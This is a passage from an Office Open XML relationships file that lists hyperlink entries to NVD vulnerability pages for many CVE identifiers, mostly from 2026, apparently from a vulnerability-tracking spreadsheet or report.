TargetMode="External" Id="rId2807" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77807" TargetMode="External" Id="rId2808" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77886" TargetMode="External" Id="rId2809" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77888" TargetMode="External" Id="rId2810" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77889" TargetMode="External" Id="rId2811" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77890" TargetMode="External" Id="rId2812" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77893" TargetMode="External" Id="rId2813" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77895" TargetMode="External" Id="rId2814" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77898" TargetMode="External" Id="rId2815" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78071" TargetMode="External" Id="rId2816" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78130" TargetMode="External" Id="rId2817" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78132" TargetMode="External" Id="rId2818" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78133" TargetMode="External" Id="rId2819" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78480" TargetMode="External" Id="rId2820" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78490" TargetMode="External" Id="rId2821" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78523" TargetMode="External" Id="rId2822" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78543" TargetMode="External" Id="rId2823" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78574" TargetMode="External" Id="rId2824" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78837" TargetMode="External" Id="rId2825" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79323" TargetMode="External" Id="rId2826" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79324" TargetMode="External" Id="rId2827" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79377" TargetMode="External" Id="rId2828" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79378" TargetMode="External" Id="rId2829" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79390" TargetMode="External" Id="rId2830" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79407" TargetMode="External" Id="rId2831" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79572" TargetMode="External" Id="rId2832" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79575" TargetMode="External" Id="rId2833" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79641" TargetMode="External" Id="rId2834" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79734" TargetMode="External" Id="rId2835" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79738" TargetMode="External" Id="rId2836" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79740" TargetMode="External" Id="rId2837" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79950" TargetMode="External" Id="rId2838" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80123" TargetMode="External" Id="rId2839" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80135" TargetMode="External" Id="rId2840" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80212" TargetMode="External" Id="rId2841" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80229" TargetMode="External" Id="rId2842" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80230" TargetMode="External" Id="rId2843" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80231" TargetMode="External" Id="rId2844" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80255" TargetMode="External" Id="rId2845" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80924" TargetMode="External" Id="rId2846" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81265" TargetMode="External" Id="rId2847" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81270" TargetMode="External" Id="rId2848" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81355" TargetMode="External" Id="rId2849" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81624" TargetMode="External" Id="rId2850" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81665" TargetMode="External" Id="rId2851" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81786" TargetMode="External" Id="rId2852" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81790" TargetMode="External" Id="rId2853" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81794" TargetMode="External" Id="rId2854" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81799" TargetMode="External" Id="rId2855" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81803" TargetMode="External" Id="rId2856" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81804" TargetMode="External" Id="rId2857" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82208" TargetMode="External" Id="rId2858" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82393" TargetMode="External" Id="rId2859" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82397" TargetMode="External" Id="rId2860" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83989" TargetMode="External" Id="rId2861" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84001" TargetMode="External" Id="rId2862" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84219" TargetMode="External" Id="rId2863" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84374" TargetMode="External" Id="rId2864" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84375" TargetMode="External" Id="rId2865" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84382" TargetMode="External" Id="rId2866" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84428" TargetMode="External" Id="rId2867" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84469" TargetMode="External" Id="rId2868" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84821" TargetMode="External" Id="rId2869" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85045" TargetMode="External" Id="rId2870" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85124" TargetMode="External" Id="rId2871" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85150" TargetMode="External" Id="rId2872" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85400" TargetMode="External" Id="rId2873" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85505" TargetMode="External" Id="rId2874" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86093" TargetMode="External" Id="rId2875" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86287" TargetMode="External" Id="rId2876" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86711" TargetMode="External" Id="rId2877" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87011" TargetMode="External" Id="rId2878" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87431" TargetMode="External" Id="rId2879" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87450" TargetMode="External" Id="rId2880" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87601" TargetMode="External" Id="rId2881" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87734" TargetMode="External" Id="rId2882" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87776" TargetMode="External" Id="rId2883" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87853" TargetMode="External" Id="rId2884" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87908" TargetMode="External" Id="rId2885" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88045" TargetMode="External" Id="rId2886" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88286" TargetMode="External" Id="rId2887" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88287" TargetMode="External" Id="rId2888" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88289" TargetMode="External" Id="rId2889" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88290" TargetMode="External" Id="rId2890" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-8862" TargetMode="External" Id="rId2891" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9166" TargetMode="External" Id="rId2892" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2024-1249" TargetMode="External" Id="rId2893" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-13608" TargetMode="External" Id="rId2894" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18489" TargetMode="External" Id="rId2895" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19651" TargetMode="External" Id="rId2896" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-32589" TargetMode="External" Id="rId2897" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-3833" TargetMode="External" Id="rId2898" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-42033" TargetMode="External" Id="rId2899" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48079" TargetMode="External" Id="rId2900" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48084" TargetMode="External" Id="rId2901" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48526" TargetMode="External" Id="rId2902" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50577" TargetMode="External" Id="rId2903" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53525" TargetMode="External" Id="rId2904" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54550" TargetMode="External" Id="rId2905" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56135" TargetMode="External" Id="rId2906" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-5795" TargetMode="External" Id="rId2907" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62669" TargetMode="External" Id="rId2908" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62906" TargetMode="External" Id="rId2909" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69347" TargetMode="External" Id="rId2910" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70604" TargetMode="External" Id="rId2911" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70666" TargetMode="External" Id="rId2912" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71375" TargetMode="External" Id="rId2913" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71622" TargetMode="External" Id="rId2914" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73086" TargetMode="External" Id="rId2915" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73495" TargetMode="External" Id="rId2916" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76196" TargetMode="External" Id="rId2917" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78254" TargetMode="External" Id="rId2918" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78461" TargetMode="External" Id="rId2919" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78492" TargetMode="External" Id="rId2920" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78494" TargetMode="External" Id="rId2921" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79644" TargetMode="External" Id="rId2922" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79963" TargetMode="External" Id="rId2923" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80133" TargetMode="External" Id="rId2924" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80434" TargetMode="External" Id="rId2925" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81383" TargetMode="External" Id="rId2926" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84003" TargetMode="External" Id="rId2927" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84366" TargetMode="External" Id="rId2928" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84961" TargetMode="External" Id="rId2929" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85152" TargetMode="External" Id="rId2930" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85525" TargetMode="External" Id="rId2931" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86166" TargetMode="External" Id="rId2932" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86187" TargetMode="External" Id="rId2933" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86746" TargetMode="External" Id="rId2934" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87812" TargetMode="External" Id="rId2935" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89161" TargetMode="External" Id="rId2936" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9697" TargetMode="External" Id="rId2937" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-15679" TargetMode="External" Id="rId2938" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-54518" TargetMode="External" Id="rId2939" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-11837" TargetMode="External" Id="rId2940" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-13201" TargetMode="External" Id="rId2941" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-15431" TargetMode="External" Id="rId2942" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18058" TargetMode="External" Id="rId2943" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18755" TargetMode="External" Id="rId2944" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28613" TargetMode="External" Id="rId2945" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28626" TargetMode="External" Id="rId2946" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28656" TargetMode="External" Id="rId2947" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-30819" TargetMode="External" Id="rId2948" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-39883" TargetMode="External" Id="rId2949" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-40542" TargetMode="External" Id="rId2950" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-41605" TargetMode="External" Id="rId2951" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-43869" TargetMode="External" Id="rId2952" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-44185" TargetMode="External" Id="rId2953" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45528" TargetMode="External" Id="rId2954" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47878" TargetMode="External" Id="rId2955" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48098" TargetMode="External" Id="rId2956" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49314" TargetMode="External" Id="rId2957" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50058" TargetMode="External" Id="rId2958" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50059" TargetMode="External" Id="rId2959" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50060" TargetMode="External" Id="rId2960" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50061" TargetMode="External" Id="rId2961" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50062" TargetMode="External" Id="rId2962" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50063" TargetMode="External" Id="rId2963" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50064" TargetMode="External" Id="rId2964" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54737" TargetMode="External" Id="rId2965" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55538" TargetMode="External" Id="rId2966" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61409" TargetMode="External" Id="rId2967" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63404" TargetMode="External" Id="rId2968" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67326" TargetMode="External" Id="rId2969" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67434" TargetMode="External" Id="rId2970" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69097" TargetMode="External" Id="rId2971" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 